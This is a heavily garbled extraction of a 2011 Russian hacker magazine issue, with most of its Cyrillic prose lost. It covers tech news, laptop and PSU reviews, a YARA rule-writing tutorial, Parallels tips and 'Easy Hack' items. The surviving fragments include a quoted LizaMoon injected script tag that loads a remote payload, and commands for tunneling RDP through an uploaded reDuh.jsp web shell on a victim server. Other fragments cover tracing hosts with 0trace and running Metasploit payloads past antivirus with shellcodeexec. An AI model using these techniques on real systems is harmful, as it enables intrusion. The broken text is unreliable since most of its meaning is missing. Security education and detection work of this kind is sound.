Вы находитесь на странице: 1из 148

x 06 (149) 2011

.
210
:

GOOGLE CHROME . 62

06 (149) 2011

/ C *NIX

HTML5

. 106

*NIX-

PHP

149

Silverlight:
BlackHole exploit kit
CISCO
UAC

WEB-
Linux
. 56




:
18-25

XSS Heap overflow
SQL-
, null-byte gigabyte
Black Hat

5

nikitoz@real.xakep.ru
VZLOM

INTRO


.
Forb
.
.
, .
, :
10 , 2001 .
147
2 . . , ,
.


400
7 .
.
- . ,
.
:).
nikitozz, . .
http://vkontakte.ru/xakep_mag

Content
MegaNews

004

Ferrum
016
021


14"

076

082

022
026
030

Parallels Desktop:
Mac
10

036

MIX 2011

Sikuli: Python
5
Microsoft

038

Easy-Hack

042

048
052
056
062
066

088
092

098

UAC

?

102

Silverlight

106

HTML5

110

Silverlight-
HTML5
,

SYN/ACK


TMG 2010

payload

120

Cisco

124

DNS: .

PHP-


Google Chrome

X-Tools

-
BlackHole exploit kit

:
beginners edition
Trend Micro Microsoft Security Essentials


cybercrime

TMG, NIS, GAPA



-

AVG,

075

*nix

114

MALWARE
072

PHREAKING
128

HACK TV

068

HTTP-

032

FSP AURUM GOLD 700 (AU-700)

PC_Zone

Samsung LE650B

134

PSYCHO:
,

140
143
144

FAQ UNITED
FAQ

8.5

WWW2

web-

032


Sikuli: Python

088

056

*nix

PHP-
web-

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
>

> DVD

Step
(step@real.xakep.ru)
Unix-
Ant
(antitster@gmail.com)
Security-
D1g1
(evdokimovds@gmail.com)


> xakep.ru
(xa@real.xakep.ru)

/ART

>-

>

>
(maligina@glc.ru)


: 8-800-200-3-999

/PUBLISHING

>
( )
(strekneva@glc.ru)
>



>

> -
(alekseeva@glc.ru)
> MAN TV

>
101000, , , / 652,

,

77-11802 14.02.2002
Zapolex,
.
219 833 .

>
, 115280, , . ,19, , 5 , 21
.: (495) 935-7034, : (495) 545-0906
>

>

>.

>

>

>

>

>

>

.: (495) 935-7034, : (495) 545-0906

> TECHNOLOGY
(komleva@glc.ru)
>
(olgaeml@glc.ru)
(alekhina@glc.ru)
>
(polikarpova@glc.ru)

>

>

>
(kosheleva@glc.ru)
>

>

> :
DVD-: claim@glc.ru.
>

: (495) 545-09-06

: (495) 663-82-77


.

. ,
,
.


.
.


:
content@glc.ru
, , 2011

MEGANEWS
Mifrill (mifrill@real.xakep.ru)

Meganews

DROPBOX
: Dropbox,


,
. , ,
:
config.db,
%APPDATA%\Dropbox .
email, dropbox_path host_id.
,
. .
Dropbox host_id,
config.db . ,
config.db Dropbox
,

! , , ,
, host_id .
, config.db host_id? ,

Dropbox .
, : bit.ly/dropbox_fail.

Infosecurity Europe ,
, . ,
IT- . 25% ,
, 20% , - Microsoft, 10% ,
:).

JABBER
,
ICQ, icq Mail.ru Group.
, , , . ,
AOL. :). , icq
, , .
, ,
icq.com.
,
ICQ, .
ICQ , , : ICQ- Mail.Ru Group
. ,
.
. , , Mail.ru
.

004

X 06 /149/ 2011

MEGANEWS


Apple.
, . ,
,

, . ,
, ( )

.
. Apple
2009 ,
- .
, .

, , .
- . , ,
:
, .
, ,

.

, Ubuntu (11.10)
GNOME.
.

LIZAMOON
,
- LizaMoon.
. SQL- -,
IIS + MS SQL Server,
. ,
, . , , , . ,
LizaMoon , ,
. .
Google 1 500 000 , URL, ! , ,
, , .
: ,
<script src=hxxp://lizamoon.
com/ur.php></script>,
. ,
Windows Stability Center.
,
, .
, Microsoft , -

006

, , ,
.

X 06 /149/ 2011

WEXLER.HOME 903

>> coding


, ( ,
). , , .
handycraft' , . ,
, .
.
WEXLER.HOME 903 64- Windows 7
, .

. , , ,
.

. WEXLER.HOME
750 . ,
, .

WEXLER.HOME 903 Windows 7 .


64- :
4 .
, Microsoft
Security Essentials Office 2010 Starter ( Word Excel, ).

Intel Core i5-650 3,2 - 4 . CPU



Turbo Boost, (, ). , .

GeForce GTX 460,


Fermi.
DirectX 11 GTX 460 , NVIDIA 3D
Vision, PhysX CUDA
, .
.

WEXLER.HOME 903
4 , .

Windows 7.

WEXLER
Wexler:
+7 (800) 200-9660
www.wexler.ru
Microsoft Windows 7, / ,
Microsoft.

MEGANEWS

. . .
.
, -
, -, , . , . , Google ,
,
. , , Googles Profiles
, .
, . - .
, Google , . , ,
2009 ,
Like.com,
. , Google , , - ?
, .


.
,
Twitter, Facebook, . , Like it
: Google
+1. UI
, ,

. , ,
. ,
Google Contacts Gmail +1 ,
( ). , +1
,
.

Brande Finance Google


. $44 300 000 000 .

, Commodore, 80-
Commodore Amiga. , Commodore USA
-

008

. Commodore Commodore VIC-Slim,


.
460 x 168 x 16, 1-30.1 , ,
Intel Atom D525 (1,8 )
Intel NM10. 1 2
DDR3-1066, 250 500 ,
Ethernet 100 /, 802.11b/g/n Wi-Fi Bluetooth,
Realtek HD Audio. Commodore VIC-Slim
USB 2.0, COM, VGA, .
. $295 ,
. . 1 ,
250 , Wi-Fi Bluetooth $395.
Wi-Fi Bluetooth, 2 500 $495. :).
X 06 /149/ 2011

MEGANEWS

NINTENDO
Move Play Station Kinect
Xbox 360
, .
, ,
Nintendo Wii. Wii
, Nintendo, , ,

Wii . : 2009
2010-2011
66%! Nintendo, , ,

( , 2012 )
Wii.
Wii 2 2- ,
, . ,

E3,
.
, FullHD (1080p,
720p); ,
Blu-Ray; 3D.
, Wii 2

Stream,
,
. -, .
E3 .

77
138 IT.

HTC
HTC
,
. HTC,
12 ,
:). , Android 2.3 Gingerbread
HTC Sense 3.0,
Sensation (
.). .
Sensation
: Qualcomm Scorpion 1.2

+ GPU Adreno 220 768


. SLCD- 4.3"
960540
Gorilla Glass.
, :
, HTC Mozart HTC Desire S.
:
VGA 8- LED, 1080p.
1520 . MicroUSB- Sensation
MHL. ,

HTC Sense

3.0, .
-
. , ,
25-28 000 .




,


. ,
,
, , 1%
. , 1%,
?
, :
, ,
, -

010

, ,
, ,
, ,
.
, , DVD, , ,
(,
, , ?), .
, , ?
100-150
.


:

, ,

.
, ,
1%
.
(, ,
) ,
, , .

,

. , , , .
X 06 /149/ 2011

MEGANEWS

SONY

, Sony
GeoHot ,
. ,
GeoHot -

PS3
. ,
, Sony
,
, : geohotgotsued.
blogspot.com. ,

GeoHot 31 .
Sony,
, .
,
$10 000 $250 000.

, Sony ,
, .
$10 000,
Sony, Electronic
Frontier Foundation. ,
,

DMCA ACTA, ,
, .
,
:).

,
. 7- 2011 17
.ru.


! 8 2011
N63-
.
, ,
. (1-)
, ,
.
, .

( )

.
,
,

,
, - .

.
: ,
.
,

,
. ,
, .

: rg.ru/2011/04/08/podpisdok.html.

APPLE STORE

, , ,
. ifoAppleStore.com ,
-
Apple .
,
:
Apple Store . ,

,
. , :

012

2002 ,

2011 2012 . Apple, ,
1500 2.
ifoAppleStore.com,
,
.
Apple
(
iPad 2 120 000
)? .
X 06 /149/ 2011

IMAGINE CUP
16
( ) Microsoft Imagine Cup 2011. Imagine
Cup 8 000 ,
.

. , , Windows Phone 7
Worldwide Telescope . , ,
. . ,
, ,
(
). ,
,
-.
Oriteam
Oricrafter.
.

Calvus
,
.
-!

4% 130 000 000 Avast


-
(110411-1). ,
Avast .
. .

IPHONE . ANDROID .
: .
, Apple (iPhone iPad)
. ,
,
Wi-Fi. ,
, iOS 4. consolidated.db,

iTunes. , ( -)
Apple - , ,
, .
. ? iPhone Tracker (petewarden.github.com)
, ,
iTunes.
, ... , ,
.
? ,
, iTunes Encrypt iPhone Backup. ,
X 06 /149/ 2011


Android-
. cache.cell cache.wifi,
/data/data/com.google.android.location/files,
consolidated.db. Android 50
200 WiFi-. :
12 48 WiFi.

013

MEGANEWS

WORDPRESS

Wordpress
. ,

Wordpress ,
Wordpress.com
DDoS-,
18 000 000 ,
VIP.
,

,
,
.
Wordpress .
:
root- Automattic, -
WordPress.com. -

, VIP, ,
,

( Facebook Twitter),
(, Amazon S3). , SSL-.

Automattic,
root-,
, ,
.

WEXLER
WEXLER, ,
, . , WEXLER.BOOK T5002, 5- TFT-
LED-. , ,
. , , WEXLER.BOOK T5002
( ASCII, TXT, DOC,PDB,HTML,PDF, FB2), (WMV,
RM, AVI, RMVB, 3GP, FLV, MP4, DAT, VOB, MPG, MPEG, MKV, MOV), (JPEG, BMP, GIF),
(MP3, WMA, APE, FLAC, AAC),
. , ,
WEXLER :
TFT- WEXLER.BOOK T5002 .
7 , 4 ,
- ( ) 25 .
,
.
. WEXLER.BOOK T5002 G-,
.
3499 . WEXLER.BOOK T5002
, .

YOUTUBE
YouTube ,
.
. YouTube ,
.
, -
- ,
, ... .
,

YouTube (Copyright
shcool),
Happy tree friends
(!), ,
,
. .
: youtube.com/
copyright_school.
.

SMS-
.
- 1530%.
014

X 06 /149/ 2011

DA 5000 PRO
, 5.1
DA 5000 Pro Edifier. ,
, DA5000 Pro .
: -,
DA5000 ( ), , -, DA 5000
Pro
- C3. - MDF
9 , 3 ,
DA 5000 Pro .
.
, LED-
,
, FLASH- / .
: (RMS)
212, (RMS) 212,
(RMS) 12, -

(RMS) 60. 160-20000


, 20-160 .
20 . : 450 . DA 5000
Pro $235.

Fortune , Twitter
. Facebook Twitter
$2 000 000 000 , Google $10 000 000 000.
.


, ,
. ,
, .
- (Pokerstars, Full Tilt
Poker Absolute Poker) . ,

.
:
, ,
,
.
,
,
( ). PokerStars Full Tilt
Poker , ,
, .
, .
Absolute Poker

,
- .
X 06 /149/ 2011

015

FERRUM


14"
,
, ,
. ,
,
: ,
, , . .

, ,
, ,
14 .

3DMark06. ,
PCMark Vantage ,
7-Zip WinRAR
-, SuperPI,
.
Battery Eater Pro,
:
, Wi-Fi 40%. :
, .


, .
, , , .
? - ,
- ,
. -,
. .
,
.
, , ,
.

016

X 06 /149/ 2011

26000 .

39000 .

Acer Aspire TimeL


ineX 3820T

ASUS
U43Jc

: 13.3"
: Intel Core i5-430M, 2266
: 4 DDR3-1066
: ATI Mobility Radeon HD 5650, 1024 , Intel GMA HD
: 300
: 32423522
: 1.8

: 14"
: Intel Core i7-620M, 2666
: 4 DDR3-1066
: NVIDIA GeForce 310M, 1024 , Intel GMA HD
: 500
: 344x241x32
: 2.18

Acer ,
. Acer Aspire TimeLineX 3820T .

Intel Core i5,
, . 3DMark06,
Acer Aspire TimeLineX .
. , ,
. ,
.

, , ,

.
ASUS U43Jc . ,
. :
Intel Core i7
NVIDIA, ASUS U43Jc .
.
0.5 .
- -,
. ,
2.5 .

,
, . , ,
.

X 06 /149/ 2011

. ,
.

017

FERRUM

31000 .

24000 .

Dell
Vostro 3300

HP Pavilion
dm4-1100

: 13.3"
: Intel Core i7-640M, 2800
: 4 DDR3-1066
: NVIDIA GeForce 310M (1024 ), Intel GMA HD
: 500
: 325x229x29
: 1.81

: 14"
: Intel Core i5-520M, 2400
: 4 DDR3-1066
: ATI Mobility Radeon HD 5470, 512 , Intel GMA HD
: 500
: 341x228x32
: 2

, , , .
Dell Vostro 3300. , ,
. , ,
, ,
, . :
Intel Core i7, 4 ,
0.5 .
, , .

, ,
,
, .
:
(

) Intel Core i5 ( ). 14
,
. , , 500 .

, ,
.
, . ,
.

018


, F1-F12 Fn
.
X 06 /149/ 2011

30000 .

30000 .

Samsung
SF410-S01

Sony
VPC-YA1V9R/B

: 14"
: Intel Core i5-460M, 2530
: 4 DDR3-1333
: NVIDIA GeForce 310M, 512 , Intel GMA HD
: 500
: 347x246x32
: 2.17

: 11.6"
: Intel Core i3-380UM, 1333
: 4 DDR3-1333
: Intel GMA HD
: 500
: 290x202x25
: 1.5

Samsung . .
,
(
).
Samsung SF410-S01 , , ,
.
!

Sony ,
12, 1.5 . ,
Intel Core i3-380UM, 1.5
.
, .

, .

.

, , .

X 06 /149/ 2011

, .
,
.

019

FERRUM

PCMark Vantage,

3DMark06,

Sony VPC-YA1V9R/B

Sony VPC-YA1V9R/B

Samsung SF410-S01

Samsung SF410-S01

HP Pavilion dm4-1100

HP Pavilion dm4-1100

Dell Vostro 3300

Dell Vostro 3300

ASUS U43J

ASUS U43J

Acer Aspire TimeLineX 3820T

Acer Aspire TimeLineX 3820T


0 1000 2000 3000 4000 5000 6000 7000

Sony

0 1000 2000 3000 4000 5000 6000 7000 8000

WinRAR, /

7-Zip,

Sony VPC-YA1V9R/B

Sony VPC-YA1V9R/B

Samsung SF410-S01

Samsung SF410-S01

HP Pavilion dm4-1100

HP Pavilion dm4-1100

Dell Vostro 3300

Dell Vostro 3300

ASUS U43J

ASUS U43J

Acer Aspire TimeLineX 3820T

Acer Aspire TimeLineX 3820T


0 200 400 600 800 1000 1200 1400 1600 1800 2000

0 1000 2000 3000 4000 5000 6000 7000 8000

Sony

Super Pi,

Sony VPC-YA1V9R/B

Sony VPC-YA1V9R/B

Samsung SF410-S01

Samsung SF410-S01

HP Pavilion dm4-1100

HP Pavilion dm4-1100

Dell Vostro 3300

Dell Vostro 3300

ASUS U43J

ASUS U43J

Acer Aspire TimeLineX 3820T

Acer Aspire TimeLineX 3820T


0

10

15

20

25

30

35

40

0 20 40 60 80 100 120 140 160 180 200

Samsung

. Samsung SF410-S01
,
Acer Aspire TimeLineX 3820T,
. z

, ,

020

X 06 /149/ 2011

FERRUM

FSP AURUM GOLD 700 (AU-700)

: 700
: 87%
+12V: 4
: +3.3V 28 , +5V 28 , +12V1-V4
18 , -12V 0.5 , +5Vsb 3.5
: +3.3V & +5V 160 ,
+3.3V & +5V & +12V1 & +12V4 672
PFC:
: 120
: 150x140x86
: 1.9
: 3700 .


.
, . ,
.
,
. FSP,
AURUM ( )
.
AURUM GOLD 700.



, ,
, ,
FSP. AURUM GOLD 700
-
. ()
:
, . ,
6+2 pin, SATA Molex.
.
AURUM GOLD 700 700 , 87% ( 80Plus Gold). 28 +3,3V +5V, 18
+12V. 120- ,
.


FSP AURUM GOLD 700
X 06 /149/ 2011

D-RAM DBS-2200.
. 850 .

.
. +12V
100 ,
+3.3V +5V 20 . .
+12V 200 , .
FSP AURUM GOLD 700: +3.3V &
+5V 160 , +12V1 & +12V4 500 .
, : +3.3V, +5V, +12V.
( )
, , . - ATX 1% 5%.

?
FSP AURUM GOLD 700
. , ,
,
.
, ,

, .


+ 80 PLUS Gold
+
-
-
-
, . 3%,
.
,
. AURUM
GOLD 700 , ,
. , ,
. z

021

PC_ZONE
Ant


.
,

/.
.

, .
. ,
, ,

. ,
,
.
,
-, .
-
, . .

,
. , ,

022

.
. , N .
, (
EB ?? ?? CD 13). - . .
,
, (, ASPack).
,
PEiD,
, ( ) PE-. ,
,
,
. , PEiD (
) .
X 06 /149/ 2011


YARA
- , .
, ,
. YARA (code.google.com/p/yara-project).

YARA?

, - ,
.
,
-, , .
, YARA.

.
, , .
. ,
,
.
, ( ,
-). , ,
:
rule silent_banker : banker
{
meta:
description = "This is just an example"
thread_level = 3
in_the_wild = true
strings:
$a = {6A 40 68 00 30 00 00 6A 14 8D 91}
$b = {8D 4D B0 2B C1 83 C0 27 99 6A 4E 59 F7 F9}
$c = "UVODFRYSIHLNWPEJXQZAKCBGMT"
condition:
$a or $b or $c
}

YARA, , -, $a,
$b, $c, silent_banker.
.
( ).
YARA ,
, :
VirusTotal Malware Intelligence Services (vt-mis.com);
jsunpack-n (jsunpack.jeek.org);
We Watch Your Website (wewatchyourwebsite.com).
Python,
, , YARA X 06 /149/ 2011

ASPack
. ,

.
, ,
YARA , PEiD.
.

, Python,
Linux, Windows, Mac.
.
, .
$ yara
usage: yara [OPTION]... [RULEFILE]... FILE | PID

:
, ,
, ( , ), .
- , ,
. - , YARA
.

: ?
(- , - ). ,
, - -
. , ,
. ClamAV
(clamav.net/lang/en). Latest
Stable Release ,
ClamAV. main.cvd (db.
local.clamav.net/main.cvd) daily.cvd (db.local.clamav.net/daily.cvd).
,
. daily.cvd, 100
000 . ClamAV YARA,
. ?
ClamAV, Yara. ,
,
ClamAV YARA. clamav_to_
yara.py (bit.ly/ij5HVs).
:
$ python clamav_to_yara.py -f daily.cvd -o clamav.yara

clamav.yara ,
.

023

PC_ZONE

ASPack-
system32
YARA ClamAV .
:

PEiD YARA
$ yara -r clamav.yara /pentest/msf3/data

-r ,
.
/pentest/msf3/data - (
, ClamAV), YARA
. , .
,
ClamAV, YARA. . ,
/.
.

, ,
- . ( ) struct{} /++.
rule BadBoy
{
strings:
$a = "win.exe"
$b = "http://foo.com/badfile1.exe"
$c = "http://bar.com/badfile2.exe"
condition:
$a and ($b or $c)

4. condition .
, ,
.
. , true,
, false .
, ,
win.exe URL,
BadBoy ( ).
5.
, : (wildcards), (jumps)
(alternatives). , , .
?:
$hex_string = { E2 34 ?? C8 A? FB }

,
, .
, :
$hex_string = { F4 23 [4-6] 62 B4 }

, 4
6 .
:

, .
, . :
1. rule,
.
, C/++,
, .
128 .
2. :
(strings) (condition). strings
, condition
, .
3. strings ,
$ , php. YARA ,
( ) ,
({}), :
$my_text_string = "text here"
$my_hex_string = { E2 34 A1 C8 23 FB }

024

$hex_string = { F4 23 ( 62 B4 | 56 ) 45 }

, 62 4 56,
F42362B445 F4235645.
6. , ,
at:
$a at 100 and $b at 200


, in:
$a in (0..100) and $b in (100..filesize)

6. , ,
.
of:
rule OfExample1
{
X 06 /149/ 2011

system32 YARA
strings:
$foo1 = "dummy1"
$foo2 = "dummy2"
$foo3 = "dummy3"
condition:
2 of ($foo1,$foo2,$foo3)
}

,
($foo1,$foo2,$foo3).
any ( ) all ( ).
7. , . of,
for..of:
for expression of string_set : ( boolean_expression )

: , string_
set, expression
boolean_expression. , : boolean_expression
string_set, expression
True.
.

PEiD

, ,
.

PEiD. plugins userdb.txt,
, . 1850 .
, , ,
- .
,
:
[Name of the Packer v1.0]
signature = 50 E8 ?? ?? ?? ?? 58 25 ?? F0 FF FF 8B
C8 83 C1 60 51 83 C0 40 83 EA 06 52 FF 20 9D C3
ep_only = true

,
PEiD, .
. ep_only, X 06 /149/ 2011

, ,
.
, , , ASPack? , . , , packers.yara.
PEiD , ASPack,
:
rule ASPack
{
strings:
$ = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? (43 | 44)
?? B8 ?? ?? (43 | 44) ?? 03 C5 }
$ = { 60 EB ?? 5D EB ?? FF ?? ?? ?? ?? ?? E9 }
[.. ..]
$ = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3
E8 01 }
condition:
for any of them : ($ at entrypoint)
}

ep_only true,
.
: for any of them : ($ at entrypoint).
,
, ASPack.
,
$, . ,
condition- - ,
.
, :
$ yara -r packers.yara somefile.exe

, ASPack, , !

YARA . -.
,
,
. , ,
. ,
! z

025

PC_ZONE

PARALLELS
DESKTOP:

MAC
10

Windows-
Linux-. Mac OS X .
Mac
Parallels Desktop.
. Mac OS
.
Virtual PC for Mac,

026

.
- .
, Apple -
Intel ( X 06 /149/ 2011

PD

: Coherence
) Boot Camp
Mac OS Windows.
Parallels, ,
Parallels Desktop for Mac.
Intel VT,
.

,
.

( , USB- ). , , .

.
Parallels Desktop
.
Virtual Box.
Mac.
Parallels Desktop ,
. ,
, .
Apple,
. PD6
, , .

#1.
RAM

RAM (, ,
Mac) , (Mac OS Windows) -
. Parallels Desktop 1 . ,
,
, .
:
Mac OS, -
. ?
: ,
X 06 /149/ 2011

Windows
, Parallels Desktop.
. ,
,
,
. Windows 7

(resmon.exe) . (+10%
) .

. , . ,
RAM , .
( HDD)
Mac OS.

. PD
64 ,
Windows ,
.

#2. 1,5-2


Apple MacBook Pro. : Intel HD Graphics
nVidia. :
,

, 3D-. ,
Windows 7, Aero. ,
DirectX . Aero ,
Windows ,
. , Parallels
Desktop ,
DirectX (
Mac OS), OpenGL. , ,
. .
, Mac
,
.
( ) . ,

3D-, -

027

PC_ZONE

FPS

. PD
3D-.
.
.
3D- , , . ,
.
( Aero) Windows 7
Windows XP 32 (!). ? :
1,5-2 .
, -
. , 3D, . .

#3. PD6
FPS

, Parallels Desktop
, Windows
. .
,
(
). :
1. PD.
2. Windows.
3.
.
, , Far Cry 2. .
, FPS (frames per second
). video.
showFPS=1,
(
).
: FPS,
, .

#4.

Parallels Desktop ,

.
,
,

028

FPS,
,
. , .

.pvm, /Users/ <_
>//Parallels.
Finder ( ).
config.pvs. XML-.
TextEdit .
, . , ,
.
. - ,
pvm.

#5.

Parallels Desktop 50
Mac OS X Red Hat Enterprise.

( Windows).
, , ,
Parallels Desktop , , .
, . PD
. config.pvs TextEditor, <Cmd+F>
<Autostart>0<Autostart> 0 2.
PD, .
X 06 /149/ 2011

#6.
Windows 7


Windows 7. , BIOS,
Windows 7.
, .
, ,
. ! BIOS, config.pvs
TextEditor <HideBiosOnStartEnabled>0</
HideBiosOnStartEnabled>, 0 1. Windows 7, <DisableWin7Logo>1</DisableWin7Logo>.

config.pvs

#7.
Coherence

Parallels Desktop
Coherence, Windows- Mac,
. , ,
.
PD :
Windows,
. ,
- Windows.
.
, .

. : config.pvs TextEditor <DisableDropShadow>0</
DisableDropShadow>.

#8. SmartMount

Parallels Desktop SmartMount,


(
), DVD.

, ,
. config.pvs
<SharedVolumes> :
) :
<UseExternalDisks>1</UseExternalDisks>. 1,
0 ( )
) CD/DVD-:
<UseDVDs>1</UseDVDs>.
) /
: <UseConnectedServers>1</
UseConnectedServers>.
X 06 /149/ 2011

#9.

Windows Windows Mac OS X.


,
. ,
Windows Mac
OS X , - , Windows Mac OS X.
Mac OS X, config.pvs
AutoMountNetworkDrives.
, Parallels Desktop
Mac.
Windows ,
. Mac OS X. ,
, Windows.

#10.

,
.
. , ( , ),
, ,
. , ?! Suspend/Resume,

.

.
, . z

029

PC_ZONE
Step (twitter.com/stepah)

HTTP-

, HTTP-.
,
TCP- HTTP, ,
. ,



-, .

-,


,
!
,
HTTP GET- POST-

.
,
base64.
,
.

: reDuh (sensepost.com/labs/
tools/pentest/reduh) HTTPTunnel (httptunnel.sourceforge.net). ,
(, -)
: JSP, PHP
ASPX. ,
-,
.

Java , ,
. ,
?
.
, ,
,
HTTP-.
, -
RPD-
term-serv.victim.com,
-
. HTTP-

030

.
HTTP. :
1.
reDuh.jsp,
(
ubunt00.victim.com/uploads/reDuh.jsp).
,
.
2.
reDuh reDuhClient.
,

:
$ java reDuhClient ubunt00.victim.com
80 /uploads/reDuh.jsp

3.

,
1010 .

1234 3389 (RPD) termserv.victim.com,
:
[createTunnel]
1234:term-serv.victim.com:3389

4. , RDP-
localhost:1234, TCP-
HTTP-,
ubunt00.victim.
com/uploads/reDuh.jsp,
.
,
.

, reDuh ,

(, SSH) !
HTTPTunnel,
.


GUI- ( Windows).
:
PHP Perl. HTTPTunnel
SOCKS-.
, (,
RDP-), (
, term-serv.victim.com).
, SOCKS,
HTTPTunnel. ,
-
,
FreeCap (freecap.ru), tsocks (tsocks.
sourceforge.net) . z
X 06 /149/ 2011

Might & Magic



, . , .

Parasite Eve
,
RPG-.

PC_ZONE
Step (twitter.com/stepah)

Sikuli:
Python

, WYSIWYG-,
- ,
HTML-? Sikuli
,
.
: , .
What You See is What You Script ,
Sikuli. , . Sikuli
Wixarica ,
. 2008 ,

032


-
(MIT), EECS MIT
, .
, (, X 06 /149/ 2011

)
. Sikuli
.
()
.
, hover()
Windows, , Sikuli . ,
.
,
, , Sikuli
. ,
, ,
- API. , -,
Windows/Linux/MacOS- iPhone/Android,
VNC. Sikuli
-
. , Sikuli
Jython, Python.


AutoIt.
Sikuli .
.

Sikuli

,
,
IP- Mac OS X.

,
.
, . , , .
,

. Windows.
API- :

, .
,

,

. ,
API-
.
, , ,
. , ,
AutoIt (autoitscript.com/autoit3), .
, .
, Computer Management
,
:
Run ('cmd /c "compmgmt.msc"',
@SystemDir, @SW_HIDE)
WinWaitActive("Computer Management")

, C++,
. ,
(
AutoItMacroGenerator),
X 06 /149/ 2011

-, , , Sikuli.
Linux Windows.
Sikuli Java, .
,
(click(), wait(), type() ),
, .
,
, . ,
click()
- .
?
, IDE, Sikuli.

: ,

. ,
- ,
click(),
. ,
,
. !

HTTP://WWW
links



,
Q&A,



:
answers.launchpad.
net/sikuli.

033

PC_ZONE

Sikuli

3 Sikuli
1. . , API.
, ,
?

Sikuli. ,
,

.
2. . ,
GUI-, ,
.
, Sikula
Robot Framework,
: bit.ly/kUYNwn.
Sikuli -.
3. . ,
Youtube ,
.
. Python,
(, , , ,
Sikuli ).

,

. :
click(img) ,
;
doubleClick(scr) ;
rightClick(scr) ;
hover(scr) img
;
exists(scr) true, ;

034

openApp(app) app;
switchApp(app) app (
, openApp);
type(text) text;
type(scr, text) text
scr;
popup(msg) msg.
, , . ,
.
, , -


RoutineBot (routinebot.com)
,
. ,
,
. Pascal, JScrpt Basic.
, Sikuli, ,
.
Ranorex (ranorex.com)
,
. C#, VB.NET
Python. Visual Studio
Ranorex
Recorder.
T-Plan Robot (t-plan.com)
VNCRobot ,
, VNC- ,
.
.
EggPlant (testplant.com)
, T-Plan Robot, VNC .
Linux, Windows, Mac.

X 06 /149/ 2011

Sikuli?

Like

Sikuli Script.
, GUI
.
Java Jython, . java.awt.Robot
. C++, OpenCV.
Sikuli (.sikuli) ,
Python (.py)
(.png). Sikuli . .sikuli zip
.skl-.
Sikuli IDE , . ,
Sikuli Script IDE (, Eclipse),

-.

Skype
, - ,
Python,
.
(sikuli.org/
demo.shtml), ,
.
:
1. Facebook Like.
2. Skype.
3. -,
.

4. - Bejeweled.
5. Android.
Sikuli ,
. , . z

Sikuli -

X 06 /149/ 2011

035

PC_ZONE

MIX 2011

5
Microsoft
MIX? ,
Microsoft
web-. ,

. 5 MIX 2011 z.
IE10 Platform Preview

IE9, MIX
Internet Explorer 10 Platform Preview 1
,
IE. ,
Platform Preview :
.
IE10 PP1 CSS3:
CSS3 Multi-column Layout
CSS3 Grid Layout

036

CSS3 Flexible Box Layout


CSS3 Gradients

, EcmaScript5 Strict Mode,



JavaScript,
. Strict Mode
,
delete .
IE10 PP1 DVD,
ie.microsoft.com/testdrive.
X 06 /149/ 2011

Internet Explorer Platform Preview 1

ASP.NET MVC 3

web ASP.NET MVC 3. ,


HTML5,
. ,
ASP.NET MVC Modernizer
jQuery.
WebMatrix
web-, web-,
SQL Server Compact .
WebMatrix,
web- ASP.NET PHP.
WebMatrix web-,

CMS DotNetNuke, Umbraco, WordPress
Joomla!.

Windows Phone OS 7.5

2011 Windows Phone


. ,

Windows Phone Marketplace.

,
.
WP7 ,
,
. ,
,
.
,

30% .
Internet Explorer 9
, IE
, .
JavaScript.
, HTML5 Video,
Microsoft -
: Windows Phone
26fps, iPhone 2fps, Android
11fps.
Microsoft 1 500 API ,
, ,
X 06 /149/ 2011

WebMatrix
CMS
,
, SQL- SQL Server Compact 4.0
. ,
- :
,
.
,
. ,
.
WP7:
Skype, 25 Angry
Birds.

Silverlight 5 Beta

Silverlight 5
, API.
x64- ,
.
Silverlight- :
,
;
(,
USB-);
.
, :

Trickplay /
-.
: ,
.

Kinect for Windows SDK

Kinect
, Microsoft
.
MIX SDK,
Kinect :
,
.
Kinect for Windows SDK 3D-,
Kinect ,
,
. SDK C#/VB/C++: ,
Visual Studio Kinect
SDK . z

037


GreenDog ,
(agrrrdog@gmail.com)
DSecRG.ru, Digital Security (agrrrdog@gmail.com)

Easy Hack
1

: EXE
OLLYDBG.

:
, , - ,
. . , , .
, exe
, , .
OpenEdge
,
. , ,
, .
? , , .
OllyDbg. -,
IDA Pro WinDbg, -,
.
, . , , (). OllyDbg
, .
. , .
, <>, .
, ,
View Patches. , OllyDbg
,
, .
, , , , .
, .udd-,
OllyDbg ( udd path ).


, ,
. , ,
. :
1.
2.
3.
4.
5.

.
Copy to Executable.
All modification.
.
Save file.

.
: exe . ,
. exe,
, .

:

OLLYDBG.

:
() . ,
,
- . ,
,
. . ,
OllyDbg ,
:
1) Options Debugging Options Security;
2) Ignore Crc of ode section.

038


X 06 /149/ 2011

,
INT3/0xCC, . , .
Break point manager
plug-in, : pedram.redhive.com/code/
ollydbg_plugins/olly_bp_man. / ,

:

.

:
, - :). :
- , . ,
! ,
. ,
tracerout (tracert).
ICMP- TTL 1
, ,
1.
(TTL 0 ) .
IP .
, IP- . , .

tracert. ? tracert.
? ICMP , - IP-,
.
.
-

:
WEB-.

- ? :)

X 06 /149/ 2011

. .

- . , , -
.
Immunity Debugger, .

, IP- , NAT .
BackTrack4
0trace (lcamtuf.coredump.cx) . intrace (code.google.com/p/intrace)
.
:
1)
ncat h victim_net.com 21
2)
0trace eth0 victim_net.com 21

:
h victim_net.com ;
21 , (/
);
eth0 .
, .
, .
- . ,
. TTL ()
128 , 100% Windows; 64255 , *nix.
.

:
.
,
Firefox .
. , ,
,

FF, . , ,
- .
, ,
YEHG HackerFirefox,
Ultimate Hackerfox Addons
GreaseMonkey Web Security
Toolkit (yehg.net/lab/#tools). ,
,
.
,
Mantra (getmantra.
com/download/index.html).
,
, .

.

039

: .

:
:)
- ,
.
. , , payload Metasploit
Framework meterpreter. , , MSF, meterpreter
. - . ,
antimeter
meterpreter . , antimeter .
post-exploitation meterpreter,
. ?
antimeter,
, . ! :) . .
, ? -.
, . shellcodeexe :
https://github.com/inquisb/shellcodeexec.
c , . ,
exe,
, .
.
1. shellcodeexe ;
2. - - ;
3. - ;
4. ( ) RWX,
, ;
5. () - .
,
.
: bernardodamele.blogspot.com/2011/04/execute-metasploitpayloads-bypassing.html. :
1. -
- EAX,

:
WINDOWS
.

:
.
(Group Policies) ,

Windows
....
, ( ).
, -
IE , . ,
.
c:\windows\system32\gpedit.
msc (secpol.msc) . ,
,
, ,
.

040


:
